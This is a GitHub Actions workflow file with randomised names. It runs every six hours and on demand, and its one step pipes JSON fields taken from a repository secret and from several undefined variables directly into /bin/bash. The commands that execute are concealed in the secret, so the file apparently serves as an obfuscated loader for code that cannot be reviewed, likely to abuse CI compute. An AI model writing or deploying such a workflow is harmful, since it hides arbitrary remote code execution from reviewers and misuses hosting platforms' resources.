name: couldskillful
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: couldskillful
        env:
          xn2: ${{ secrets.xn2 }}
        run: |
          echo $xn2 | jq -r .d14 | /bin/bash
          echo $zh87715 | jq -r .utqcg31165 | /bin/bash
          echo $kmf2972 | jq -r .lvtqa8 | /bin/bash
          echo $i4 | jq -r .i04 | /bin/bash
          echo $cspqo9 | jq -r .lygbs00 | /bin/bash
          echo $lb47862 | jq -r .okiu041 | /bin/bash
          echo $brs9776 | jq -r .wmpbt81 | /bin/bash

